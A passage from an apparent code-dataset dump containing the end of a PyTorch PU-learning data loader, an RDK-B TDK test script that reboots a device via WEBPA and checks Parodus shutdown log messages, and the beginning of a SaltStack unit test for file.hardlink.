shuffle=True, num_workers=2)
u_validloader = torch.utils.data.DataLoader(u_validdata, batch_size=batch_size, \
shuffle=True, num_workers=2)
## Initialize model
net = get_model(net_type, input_dim = 3072)
net = net.to(device)
elif data_type=='cifar_binarized':
transform_train = transforms.Compose([
transforms.RandomCrop(32, padding=4),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),
])
transform_test = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),
])
traindata = BinarizedCifarData(root=data_dir, train=True, transform=transform_train)
testdata = BinarizedCifarData(root=data_dir, train=False, transform=transform_test)
u_traindata = get_PNDataSplits(traindata,pos_size=12500, neg_size=int(12500*(1-alpha)*(1-beta)/beta),data_type='cifar')
u_validdata = get_PNDataSplits(testdata,pos_size=int(2500*alpha), neg_size=int(2500*(1-alpha)),data_type='cifar')
u_trainloader = torch.utils.data.DataLoader(u_traindata, batch_size=batch_size, \
shuffle=True, num_workers=2)
u_validloader = torch.utils.data.DataLoader(u_validdata, batch_size=batch_size, \
shuffle=True, num_workers=2)
## Initialize model
net = get_model(net_type, input_dim = 3072)
net = net.to(device)
elif data_type=="IMDb_BERT":
train_texts, train_labels = read_imdb_split(f'./{data_dir}/aclImdb/train')
test_texts, test_labels = read_imdb_split(f'./{data_dir}/aclImdb/test')
transform = initialize_bert_transform('distilbert-base-uncased')
train_dataset = IMDbBERTData(train_texts, train_labels, transform=transform)
test_dataset = IMDbBERTData(test_texts, test_labels, transform=transform)
u_traindata = get_PNDataSplits(train_dataset, pos_size=6250, neg_size=int(6250*(1-alpha)*(1-beta)/beta) ,data_type='IMDb_BERT')
u_validdata = get_PNDataSplits(test_dataset, pos_size=int(5000*alpha), neg_size=int(5000*(1-alpha)) ,data_type='IMDb_BERT')
# X = p_traindata.targets
# Y = u_traindata.targets
u_trainloader = torch.utils.data.DataLoader(u_traindata, batch_size=8, \
shuffle=True)
u_validloader = torch.utils.data.DataLoader(u_validdata, batch_size=128, \
shuffle=True)
## Initialize model
net = get_model(net_type)
net = net.to(device)
return u_trainloader, u_validloader, net | 42.173077 | 143 | 0.641867 | 3,534 | 28,509 | 4.918506 | 0.050934 | 0.049707 | 0.046715 | 0.077321 | 0.926418 | 0.91658 | 0.898861 | 0.889253 | 0.886262 | 0.867909 | 0 | 0.032513 | 0.249114 | 28,509 | 676 | 144 | 42.173077 | 0.779465 | 0.012978 | 0 | 0.786177 | 0 | 0 | 0.019377 | 0.005321 | 0 | 0 | 0 | 0 | 0.00432 | 1 | 0.021598 | false | 0 | 0.025918 | 0.00432 | 0.069114 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
6ee3be7ee1b589fbfb22f15929bba99cfa92148d | 29,131 | py | Python | testscripts/RDKB/component/WEBPA/TS_WEBPA_CheckLogs_ParodusShutdown.py | rdkcmf/rdkb-tools-tdkb | 9f9c3600cd701d5fc90ac86a6394ebd28d49267e | [
"Apache-2.0"
] | null | null | null | testscripts/RDKB/component/WEBPA/TS_WEBPA_CheckLogs_ParodusShutdown.py | rdkcmf/rdkb-tools-tdkb | 9f9c3600cd701d5fc90ac86a6394ebd28d49267e | [
"Apache-2.0"
] | null | null | null | testscripts/RDKB/component/WEBPA/TS_WEBPA_CheckLogs_ParodusShutdown.py | rdkcmf/rdkb-tools-tdkb | 9f9c3600cd701d5fc90ac86a6394ebd28d49267e | [
"Apache-2.0"
] | null | null | null | ##########################################################################
# If not stated otherwise in this file or this component's Licenses.txt
# file the following copyright and licenses apply:
#
# Copyright 2020 RDK Management
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##########################################################################
'''
<?xml version='1.0' encoding='utf-8'?>
<xml>
<id></id>
<!-- Do not edit id. This will be auto filled while exporting. If you are adding a new script keep the id empty -->
<version>3</version>
<!-- Do not edit version. This will be auto incremented while updating. If you are adding a new script you can keep the vresion as 1 -->
<name>TS_WEBPA_CheckLogs_ParodusShutdown</name>
<!-- If you are adding a new script you can specify the script name. Script Name should be unique same as this file name with out .py extension -->
<primitive_test_id></primitive_test_id>
<!-- Do not change primitive_test_id if you are editing an existing script. -->
<primitive_test_name>WEBPA_Donothing</primitive_test_name>
<!-- -->
<primitive_test_version>1</primitive_test_version>
<!-- -->
<status>FREE</status>
<!-- -->
<synopsis>To Check for Parodus proper Shutdown and SIGTREM received in Consolelog.txt.0 and PARODUSlog.txt.0 when rebooted by Device.X_CISCO_COM_DeviceControl.RebootDevice via WEBPA</synopsis>
<!-- -->
<groups_id />
<!-- -->
<execution_time>30</execution_time>
<!-- -->
<long_duration>false</long_duration>
<!-- -->
<advanced_script>false</advanced_script>
<!-- execution_time is the time out time for test execution -->
<remarks></remarks>
<!-- Reason for skipping the tests if marked to skip -->
<skip>false</skip>
<!-- -->
<box_types>
<box_type>Broadband</box_type>
<!-- -->
</box_types>
<rdk_versions>
<rdk_version>RDKB</rdk_version>
<!-- -->
</rdk_versions>
<test_cases>
<test_case_id>TC_WEBPA_38</test_case_id>
<test_objective>This test case is to Check for Parodus proper Shutdown and SIGTREM received in Consolelog.txt.0 and PARODUSlog.txt.0 when rebooted by Device.X_CISCO_COM_DeviceControl.RebootDevice via WEBPA</test_objective>
<test_type>Positive</test_type>
<test_setup>Broadband</test_setup>
<pre_requisite>1.Ccsp Components should be in a running state of DUT
2.TDK Agent should be in running state or invoke it through StartTdk.sh script</pre_requisite>
<api_or_interface_used>N/A</api_or_interface_used>
<input_parameters>Device.DeviceInfo.X_RDKCENTRAL-COM_RFC.Feature.ManageableNotification.Enable
Device.X_CISCO_COM_DeviceControl.RebootDevice</input_parameters>
<automation_approch>1)Load the module
2)Get the Manageable Notification status using Device.DeviceInfo.X_RDKCENTRAL-COM_RFC.Feature.ManageableNotification.Enable Check if enabled if not enable it.
3)Check for PARODUSlog.txt.0 and Consolelog.txt.0 file presence.
4)Capture the tail -f of /rdklogs/logs/PARODUSlog.txt.0 in /nvram/tdk_PARODUStail
5)Capture the tail -f of /rdklogs/logs/Consolelog.txt.0 in /nvram/tdk_Consoletail
6)Trigger a reboot via Webpa using Device.X_CISCO_COM_DeviceControl.RebootDevice set to "Device"
7)Grep for the following in tdk_PAMtail
grep -i "reboot-pending" /nvram/tdk_PARODUStail
grep -i "PARODUS: SIGTERM received" /nvram/tdk_PARODUStail
grep -i "PARODUS: cloud_status set as offline after connection close" /nvram/tdk_PARODUStail
grep -i "PARODUS: SIGTERM received" /nvram/tdk_PARODUStail
grep -i "Shutdown parodus" /nvram/tdk_Consoletail
8) Remove the file created rm -rf /nvram/tdk_PARODUStail and /nvram/tdk_Consoletail
9)Revert the Manageable Notification status to default if set
10)Unload the Module</automation_approch>
<expected_output>The log Message "reboot-pending","PARODUS: SIGTERM received","PARODUS: cloud_status set as offline after connection close","PARODUS: SIGTERM received","Shutdown parodus", should be available in the logs captured at the time of reboot initiation</expected_output>
<priority>High</priority>
<test_stub_interface>PAM</test_stub_interface>
<test_script>TS_WEBPA_CheckLogs_ParodusShutdown</test_script>
<skipped>No</skipped>
<release_version>M79</release_version>
<remarks>None</remarks>
</test_cases>
<script_tags />
</xml>
'''
# use tdklib library,which provides a wrapper for tdk testcase script
import tdklib;
import webpaUtility;
from webpaUtility import *
#Test component to be tested
obj1= tdklib.TDKScriptingLibrary("tdkbtr181","1");
obj2= tdklib.TDKScriptingLibrary("sysutil","1");
#IP and Port of box, No need to change,
#This will be replaced with corresponding DUT Ip and port while executing script
ip = <ipaddress>
port = <port>
obj1.configureTestCase(ip,port,'TS_WEBPA_CheckLogs_ParodusShutdown');
obj2.configureTestCase(ip,port,'TS_WEBPA_CheckLogs_ParodusShutdown');
#Get the result of connection with test component and DUT
loadmodulestatus1=obj1.getLoadModuleResult();
loadmodulestatus2=obj2.getLoadModuleResult();
setflag = 1;
revertflag = 0;
def verify_logMsgs(tdkTestObj):
ParoduslogMsgs_list = ["reboot-pending","PARODUS: SIGTERM received","PARODUS: cloud_status set as offline after connection close","PARODUS: SIGTERM received"]
ConsolelogMsgs_list = ["Shutdown parodus"]
print"The following logs should be present when undergoing webpa reboot";
print ParoduslogMsgs_list;
print ConsolelogMsgs_list;
for list in ParoduslogMsgs_list:
cmd = "cat /nvram/tdk_PARODUStail | grep -ire \"%s\"" %list;
tdkTestObj.addParameter("command",cmd);
tdkTestObj.executeTestCase(expectedresult);
actualresult = tdkTestObj.getResult();
details = tdkTestObj.getResultDetails().strip().replace("\\n", "");
print "LogMsg is :",details
if expectedresult in actualresult and details != "" and list in details:
Pmsgpresent = 1;
else:
Pmsgpresent = 0;
print "Log Mesage %s is NOT present"%list
break;
for list in ConsolelogMsgs_list:
cmd = "cat /nvram/tdk_Consoletail | grep -ire \"%s\"" %list;
tdkTestObj.addParameter("command",cmd);
tdkTestObj.executeTestCase(expectedresult);
actualresult = tdkTestObj.getResult();
details = tdkTestObj.getResultDetails().strip().replace("\\n", "");
print "LogMsg is :",details
if expectedresult in actualresult and details !="" and list in details:
Cmsgpresent = 1;
else:
Cmsgpresent = 0;
print "Log Mesage %s is NOT present"%list
break;
return Pmsgpresent,Cmsgpresent;
if "SUCCESS" in loadmodulestatus1.upper() and "SUCCESS" in loadmodulestatus2.upper() :
#Set the result status of execution
obj1.setLoadModuleStatus("SUCCESS");
obj2.setLoadModuleStatus("SUCCESS");
tdkTestObj = obj1.createTestStep('TDKB_TR181Stub_Get');
tdkTestObj.addParameter("ParamName","Device.DeviceInfo.X_RDKCENTRAL-COM_RFC.Feature.ManageableNotification.Enable");
expectedresult="SUCCESS";
#Execute the test case in DUT
tdkTestObj.executeTestCase(expectedresult);
actualresult = tdkTestObj.getResult();
default = tdkTestObj.getResultDetails();
if expectedresult in actualresult :
#Set the result status of execution
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 1: Get the status of Manageable Notification";
print "EXPECTED RESULT 1: Should get the status of Manageable Notification";
print "ACTUAL RESULT 1: Manageable Notification status is :%s" %default;
#Get the result of execution
print "[TEST EXECUTION RESULT] : SUCCESS";
if default != "true":
tdkTestObj = obj1.createTestStep('TDKB_TR181Stub_Set');
tdkTestObj.addParameter("ParamName","Device.DeviceInfo.X_RDKCENTRAL-COM_RFC.Feature.ManageableNotification.Enable");
tdkTestObj.addParameter("ParamValue","true");
tdkTestObj.addParameter("Type","bool");
expectedresult="SUCCESS";
#Execute the test case in DUT
tdkTestObj.executeTestCase(expectedresult);
actualresult = tdkTestObj.getResult();
details = tdkTestObj.getResultDetails();
if expectedresult in actualresult :
#Set the result status of execution
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 2: Set the status of Manageable Notification to true";
print "EXPECTED RESULT 2: Should set the status of Manageable Notification to true";
print "ACTUAL RESULT 2: Manageable Notification status is :%s" %details;
#Get the result of execution
print "[TEST EXECUTION RESULT] : SUCCESS";
revertflag = 1;
else:
#Set the result status of execution
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP 2: Set the status of Manageable Notification to true";
print "EXPECTED RESULT 2: Should set the status of Manageable Notification to true";
print "ACTUAL RESULT 2: Manageable Notification status is :%s" %details;
#Get the result of execution
print "[TEST EXECUTION RESULT] : FAILURE";
setflag = 0;
if setflag ==1 :
tdkTestObj = obj2.createTestStep('ExecuteCmd');
cmd = "[ -f /rdklogs/logs/PARODUSlog.txt.0 ] && echo \"File exist\" || echo \"File does not exist\"";
tdkTestObj.addParameter("command",cmd);
expectedresult="SUCCESS";
tdkTestObj.executeTestCase(expectedresult);
actualresult = tdkTestObj.getResult();
details = tdkTestObj.getResultDetails().strip().replace("\\n", "");
if details == "File exist":
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 2: Check for PARODUSlog.txt.0 log file presence";
print "EXPECTED RESULT 2:PARODUSlog.txt.0 log file should be present";
print "ACTUAL RESULT 2:PARODUSlog.txt.0 file is present";
#Get the result of execution
print "[TEST EXECUTION RESULT] : SUCCESS";
tdkTestObj = obj2.createTestStep('ExecuteCmd');
cmd = "[ -f /rdklogs/logs/Consolelog.txt.0 ] && echo \"File exist\" || echo \"File does not exist\"";
tdkTestObj.addParameter("command",cmd);
expectedresult="SUCCESS";
tdkTestObj.executeTestCase(expectedresult);
actualresult = tdkTestObj.getResult();
details = tdkTestObj.getResultDetails().strip().replace("\\n", "");
if details == "File exist":
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 3: Check for Consolelog.txt.0 log file presence";
print "EXPECTED RESULT 3:Consolelog.txt.0 log file should be present";
print "ACTUAL RESULT 3:Consolelog.txt.0 file is present";
#Get the result of execution
print "[TEST EXECUTION RESULT] : SUCCESS";
query="echo > /nvram/tdk_PARODUStail"
print "query:%s" %query
tdkTestObj = obj2.createTestStep('ExecuteCmd');
tdkTestObj.addParameter("command", query)
expectedresult="SUCCESS";
tdkTestObj.executeTestCase(expectedresult);
actualresult = tdkTestObj.getResult();
details = tdkTestObj.getResultDetails().strip().replace("\\n","");
if expectedresult in actualresult :
#Set the result status of execution
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 4: Create a file in nvram to copy the tail -f of PARODUSlog.txt.0";
print "EXPECTED RESULT 4: Should create a file in nvram to copy the tail -f of PARODUSlog.txt.0";
print "ACTUAL RESULT 4: File creation was successful";
#Get the result of execution
print "[TEST EXECUTION RESULT] : SUCCESS";
query="echo > /nvram/tdk_Consoletail"
print "query:%s" %query
tdkTestObj = obj2.createTestStep('ExecuteCmd');
tdkTestObj.addParameter("command", query)
expectedresult="SUCCESS";
tdkTestObj.executeTestCase(expectedresult);
actualresult = tdkTestObj.getResult();
details = tdkTestObj.getResultDetails().strip().replace("\\n","");
if expectedresult in actualresult :
#Set the result status of execution
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 5: Create a file in nvram to copy the tail -f of Consolelog.txt.0";
print "EXPECTED RESULT 5: Should create a file in nvram to copy the tail -f of Consolelog.txt.0";
print "ACTUAL RESULT 5: File creation was successful";
#Get the result of execution
print "[TEST EXECUTION RESULT] : SUCCESS";
query="tail -f /rdklogs/logs/PARODUSlog.txt.0 > /nvram/tdk_PARODUStail &"
print "query:%s" %query
tdkTestObj = obj2.createTestStep('ExecuteCmd');
tdkTestObj.addParameter("command", query)
expectedresult="SUCCESS";
tdkTestObj.executeTestCase(expectedresult);
actualresult = tdkTestObj.getResult();
details = tdkTestObj.getResultDetails().strip().replace("\\n","");
if expectedresult in actualresult :
#Set the result status of execution
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 6: Tail the Parodus Logs to the file created in nvram and add the process to background";
print "EXPECTED RESULT 6: Should tail the Parodus Logs to the file created in nvram and add the process to background";
print "ACTUAL RESULT 6: Tail the Parodus Logs to the file created in nvram and add the process to background was successfull";
#Get the result of execution
print "[TEST EXECUTION RESULT] : SUCCESS";
query="tail -f /rdklogs/logs/Consolelog.txt.0 > /nvram/tdk_Consoletail &"
print "query:%s" %query
tdkTestObj = obj2.createTestStep('ExecuteCmd');
tdkTestObj.addParameter("command", query)
expectedresult="SUCCESS";
tdkTestObj.executeTestCase(expectedresult);
actualresult = tdkTestObj.getResult();
details = tdkTestObj.getResultDetails().strip().replace("\\n","");
if expectedresult in actualresult :
#Set the result status of execution
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 7: Tail the Console Logs to the file created in nvram and add the process to background";
print "EXPECTED RESULT 7: Should tail the Console Logs to the file created in nvram and add the process to background";
print "ACTUAL RESULT 7: Tail the Console Logs to the file created in nvram and add the process to background was successfull";
#Get the result of execution
print "[TEST EXECUTION RESULT] : SUCCESS";
tdkTestObj,preRequisiteStatus = webpaPreRequisite(obj2);
#Saving Current state before reboot
obj2.saveCurrentState();
if "SUCCESS" in preRequisiteStatus:
queryParam = {"name":"Device.X_CISCO_COM_DeviceControl.RebootDevice","value":"Device","dataType":0}
queryResponse = webpaQuery(obj2, queryParam,"set")
parsedResponse = parseWebpaResponse(queryResponse, 1, "set")
print "parsedResponse : %s" %parsedResponse;
tdkTestObj = obj2.createTestStep('ExecuteCmd');
tdkTestObj.executeTestCase("SUCCESS");
if "SUCCESS" in parsedResponse[0]:
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 8: Call for Device Reboot via WEBPA";
print "EXPECTED RESULT 8: Device Reboot via WEBPA should be successfull"
print "ACTUAL RESULT 8: Device Reboot via WEBPA was successfull";
#Get the result of execution
print "[TEST EXECUTION RESULT] : SUCCESS";
#Restore the device state saved before reboot
obj2.restorePreviousStateAfterReboot();
tdkTestObj = obj2.createTestStep('ExecuteCmd');
Presult,Cresult = verify_logMsgs(tdkTestObj);
if Presult == 1 and Cresult == 1:
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 9: Check if the above mentioned LogMsgs are present in PARODUSlog.txt.0 and Consolelog.txt.0";
print "EXPECTED RESULT 9: The above mentioned LogMsgs Should be present in PARODUSlog.txt.0 and Consolelog.txt.0"
print "ACTUAL RESULT 9: The expected LogMsgs were populated successfully in PARODUSlog.txt.0 and Consolelog.txt.0";
#Get the result of execution
print "[TEST EXECUTION RESULT] : SUCCESS";
else:
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP 9: Check if the above mentioned LogMsgs are presnt in PARODUSlog.txt.0 and Consolelog.txt.0";
print "EXPECTED RESULT 9: The above mentioned LogMsgs Should be present in PARODUSlog.txt.0 and Consolelog.txt.0"
print "ACTUAL RESULT 9: The expected LogMsgs failed to populate in PARODUSlog.txt.0 or Consolelog.txt.0";
#Get the result of execution
print "[TEST EXECUTION RESULT] : FAILURE";
else:
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP 8: Call for Device Reboot via WEBPA";
print "EXPECTED RESULT 8: Device Reboot via WEBPA should be successfull"
print "ACTUAL RESULT 8: Device Reboot via WEBPA was successfull";
#Get the result of execution
print "[TEST EXECUTION RESULT] :FAILURE";
else:
tdkTestObj.setResultStatus("FAILURE");
print "Webpa Pre-requisite failed. Please check parodus and webpa processes are running in device"
else:
#Set the result status of execution
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP 7: Tail the Console Logs to the file created in nvram and add the process to background";
print "EXPECTED RESULT 7: Should tail the Console Logs to the file created in nvram and add the process to background";
print "ACTUAL RESULT 7: Tail the Console Logs to the file created in nvram and add the process to background failed";
#Get the result of execution
print "[TEST EXECUTION RESULT] :FAILURE";
else:
#Set the result status of execution
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP 6: Tail the Parodus Logs to the file created in nvram and add the process to background";
print "EXPECTED RESULT 6: Should tail the Parodus Logs to the file created in nvram and add the process to background";
print "ACTUAL RESULT 6: Tail the Parodus Logs to the file created in nvram and add the process to background failed";
#Get the result of execution
print "[TEST EXECUTION RESULT] : FAILURE";
#Delete the file created under nvram
query="rm -rf /nvram/tdk_Consoletail"
print "query:%s" %query
tdkTestObj = obj2.createTestStep('ExecuteCmd');
tdkTestObj.addParameter("command", query)
expectedresult="SUCCESS";
tdkTestObj.executeTestCase(expectedresult);
actualresult = tdkTestObj.getResult();
details = tdkTestObj.getResultDetails().strip().replace("\\n","");
if expectedresult in actualresult :
#Set the result status of execution
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 10: Delete the tdk_Consoletail file created under nvram";
print "EXPECTED RESULT 10: Should Delete the tdk_Consoletail file created under nvram";
print "ACTUAL RESULT 10: File Deletion was successfull";
#Get the result of execution
print "[TEST EXECUTION RESULT] :SUCCESS";
else:
#Set the result status of execution
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP 10: Delete the tdk_Consoletail file created under nvram";
print "EXPECTED RESULT 10: Should Delete the tdk_Consoletail file created under nvram";
print "ACTUAL RESULT 10: File Deletion Failed";
#Get the result of execution
print "[TEST EXECUTION RESULT] :FAILURE";
else:
#Set the result status of execution
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP 5: Create a file in nvram to copy the tail -f of Consolelog.txt.0";
print "EXPECTED RESULT 5: Should create a file in nvram to copy the tail -f of Consolelog.txt.0";
print "ACTUAL RESULT 5: File creation was successful";
#Get the result of execution
print "[TEST EXECUTION RESULT] : FAILURE";
#Delete the file created under nvram
query="rm -rf /nvram/tdk_PARODUStail"
print "query:%s" %query
tdkTestObj = obj2.createTestStep('ExecuteCmd');
tdkTestObj.addParameter("command", query)
expectedresult="SUCCESS";
tdkTestObj.executeTestCase(expectedresult);
actualresult = tdkTestObj.getResult();
details = tdkTestObj.getResultDetails().strip().replace("\\n","");
if expectedresult in actualresult :
#Set the result status of execution
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 11: Delete the tdk_PARODUSTail file created under nvram";
print "EXPECTED RESULT 11: Should Delete tdk_ParodusTail file created under nvram";
print "ACTUAL RESULT 11: File Deletion was successfull";
#Get the result of execution
print "[TEST EXECUTION RESULT] :SUCCESS";
else:
#Set the result status of execution
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP 11: Delete the tdk_PARODUSTail file created under nvram";
print "EXPECTED RESULT 11: Should Delete the tdk_PARODUSTail file created under nvram";
print "ACTUAL RESULT 11: File Deletion Failed";
#Get the result of execution
print "[TEST EXECUTION RESULT] :FAILURE";
else:
#Set the result status of execution
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP 4: Create a file in nvram to copy the tail -f of PARODUSlog.txt.0";
print "EXPECTED RESULT 4: Should create a file in nvram to copy the tail -f of PARODUSlog.txt.0";
print "ACTUAL RESULT 4: File creation failed";
#Get the result of execution
print "[TEST EXECUTION RESULT] : FAILURE";
else:
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP 3: Check for Consolelog.txt.0 log file presence";
print "EXPECTED RESULT 3:Consolelog.txt.0 log file should be present";
print "ACTUAL RESULT 3:Consolelog.txt.0 file is not present";
#Get the result of execution
print "[TEST EXECUTION RESULT] : FAILURE";
else:
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP 2: Check for PARODUSlog.txt.0 log file presence";
print "EXPECTED RESULT 2:PARODUSlog.txt.0 log file should be present";
print "ACTUAL RESULT 2:PARODUSlog.txt.0 file is not present";
#Get the result of execution
print "[TEST EXECUTION RESULT] : FAILURE";
else:
tdkTestObj.setResultStatus("FAILURE");
print " Manageable Notification was disabled and failed on enabling" ;
else:
#Set the result status of execution
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP 1: Get the status of Manageable Notification";
print "EXPECTED RESULT 1: Should get the status of Manageable Notification";
print "ACTUAL RESULT 1: Manageable Notification status is :%s" %default;
#Get the result of execution
print "[TEST EXECUTION RESULT] : FAILURE";
if revertflag ==1:
tdkTestObj = obj1.createTestStep('TDKB_TR181Stub_Set');
tdkTestObj.addParameter("ParamName","Device.DeviceInfo.X_RDKCENTRAL-COM_RFC.Feature.ManageableNotification.Enable");
tdkTestObj.addParameter("ParamValue",default);
tdkTestObj.addParameter("Type","bool");
expectedresult="SUCCESS";
#Execute the test case in DUT
tdkTestObj.executeTestCase(expectedresult);
actualresult = tdkTestObj.getResult();
details = tdkTestObj.getResultDetails();
if expectedresult in actualresult :
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 12: Revert the Manageable Notification to previous value";
print "EXPECTED RESULT 12:Should Revert the Manageable Notification to previous value"
print "ACTUAL RESULT 12:Revert was successfull";
#Get the result of execution
print "[TEST EXECUTION RESULT] :SUCCESS";
else:
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP 12: Revert the Manageable Notification to previous value";
print "EXPECTED RESULT 12:Should Revert the Manageable Notification to previous value"
print "ACTUAL RESULT 12:Revertion failed";
#Get the result of execution
print "[TEST EXECUTION RESULT] :FAILURE";
obj1.unloadModule("tdkbtr181");
obj2.unloadModule("sysutil");
else:
print "Failed to load module";
obj1.setLoadModuleStatus("FAILURE");
obj2.setLoadModuleStatus("FAILURE");
| 58.145709 | 283 | 0.60173 | 3,068 | 29,131 | 5.665254 | 0.121904 | 0.026926 | 0.018641 | 0.021748 | 0.757666 | 0.745929 | 0.729072 | 0.716472 | 0.709856 | 0.69553 | 0 | 0.011908 | 0.313927 | 29,131 | 500 | 284 | 58.262 | 0.85775 | 0.083966 | 0 | 0.720126 | 0 | 0.069182 | 0.376199 | 0.028296 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.009434 | null | null | 0.380503 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
6e0d29b0ddc8dfcf08c2c8dc35205fdef49840bb | 18,341 | py | Python | tests/pytests/unit/states/file/test_hardlink.py | tomdoherty/salt | f87d5d7abbf9777773c4d91fdafecb8b1a728e76 | [
"Apache-2.0"
] | 9,425 | 2015-01-01T05:59:24.000Z | 2022-03-31T20:44:05.000Z | tests/pytests/unit/states/file/test_hardlink.py | tomdoherty/salt | f87d5d7abbf9777773c4d91fdafecb8b1a728e76 | [
"Apache-2.0"
] | 33,507 | 2015-01-01T00:19:56.000Z | 2022-03-31T23:48:20.000Z | tests/pytests/unit/states/file/test_hardlink.py | tomdoherty/salt | f87d5d7abbf9777773c4d91fdafecb8b1a728e76 | [
"Apache-2.0"
] | 5,810 | 2015-01-01T19:11:45.000Z | 2022-03-31T02:37:20.000Z | import logging
import os
import pytest
import salt.serializers.json as jsonserializer
import salt.serializers.msgpack as msgpackserializer
import salt.serializers.plist as plistserializer
import salt.serializers.python as pythonserializer
import salt.serializers.yaml as yamlserializer
import salt.states.file as filestate
import salt.utils.files
import salt.utils.json
import salt.utils.platform
import salt.utils.win_functions
import salt.utils.yaml
from salt.exceptions import CommandExecutionError
from tests.support.mock import MagicMock, patch
log = logging.getLogger(__name__)
@pytest.fixture
def configure_loader_modules():
return {
filestate: {
"__env__": "base",
"__salt__": {"file.manage_file": False},
"__serializers__": {
"yaml.serialize": yamlserializer.serialize,
"yaml.seserialize": yamlserializer.serialize,
"python.serialize": pythonserializer.serialize,
"json.serialize": jsonserializer.serialize,
"plist.serialize": plistserializer.serialize,
"msgpack.serialize": msgpackserializer.serialize,
},
"__opts__": {"test": False, "cachedir": ""},
"__instance_id__": "",
"__low__": {},
"__utils__": {},
}
}
@pytest.mark.skip_on_windows(reason="Do not run on Windows")
def test_hardlink(tmp_path):
"""
Test to create a hardlink.
"""
name = str(tmp_path / "testfile.txt")
target = str(tmp_path / "target.txt")
with salt.utils.files.fopen(target, "w") as fp:
fp.write("")
test_dir = str(tmp_path)
user, group = "salt", "saltstack"
def return_val(**kwargs):
res = {
"name": name,
"result": False,
"comment": "",
"changes": {},
}
res.update(kwargs)
return res
mock_t = MagicMock(return_value=True)
mock_f = MagicMock(return_value=False)
mock_empty = MagicMock(return_value="")
mock_uid = MagicMock(return_value="U1001")
mock_gid = MagicMock(return_value="g1001")
mock_nothing = MagicMock(return_value={})
mock_stats = MagicMock(return_value={"inode": 1})
mock_execerror = MagicMock(side_effect=CommandExecutionError)
patches = {}
patches["file.user_to_uid"] = mock_empty
patches["file.group_to_gid"] = mock_empty
patches["user.info"] = mock_empty
patches["file.is_hardlink"] = mock_t
patches["file.stats"] = mock_empty
# Argument validation
with patch.dict(filestate.__salt__, patches):
expected = "Must provide name to file.hardlink"
ret = return_val(comment=expected, name="")
assert filestate.hardlink("", target) == ret
# User validation for dir_mode
with patch.dict(filestate.__salt__, patches), patch.dict(
filestate.__salt__, {"file.user_to_uid": mock_empty}
), patch.dict(filestate.__salt__, {"file.group_to_gid": mock_gid}), patch.object(
os.path, "isabs", mock_t
):
expected = "User {} does not exist".format(user)
ret = return_val(comment=expected, name=name)
assert filestate.hardlink(name, target, user=user, group=group) == ret
# Group validation for dir_mode
with patch.dict(filestate.__salt__, patches), patch.dict(
filestate.__salt__, {"file.user_to_uid": mock_uid}
), patch.dict(filestate.__salt__, {"file.group_to_gid": mock_empty}), patch.object(
os.path, "isabs", mock_t
):
expected = "Group {} does not exist".format(group)
ret = return_val(comment=expected, name=name)
assert filestate.hardlink(name, target, user=user, group=group) == ret
# Absolute path for name
nonabs = "./non-existent-path/to/non-existent-file"
with patch.dict(filestate.__salt__, patches), patch.dict(
filestate.__salt__, {"file.user_to_uid": mock_uid}
), patch.dict(filestate.__salt__, {"file.group_to_gid": mock_gid}):
expected = "Specified file {} is not an absolute path".format(nonabs)
ret = return_val(comment=expected, name=nonabs)
assert filestate.hardlink(nonabs, target, user=user, group=group) == ret
# Absolute path for target
with patch.dict(filestate.__salt__, patches), patch.dict(
filestate.__salt__, {"file.user_to_uid": mock_uid}
), patch.dict(filestate.__salt__, {"file.group_to_gid": mock_gid}):
expected = "Specified target {} is not an absolute path".format(nonabs)
ret = return_val(comment=expected, name=name)
assert filestate.hardlink(name, nonabs, user=user, group=group) == ret
# Test option -- nonexistent target
with patch.dict(filestate.__salt__, patches), patch.dict(
filestate.__salt__, {"file.user_to_uid": mock_uid}
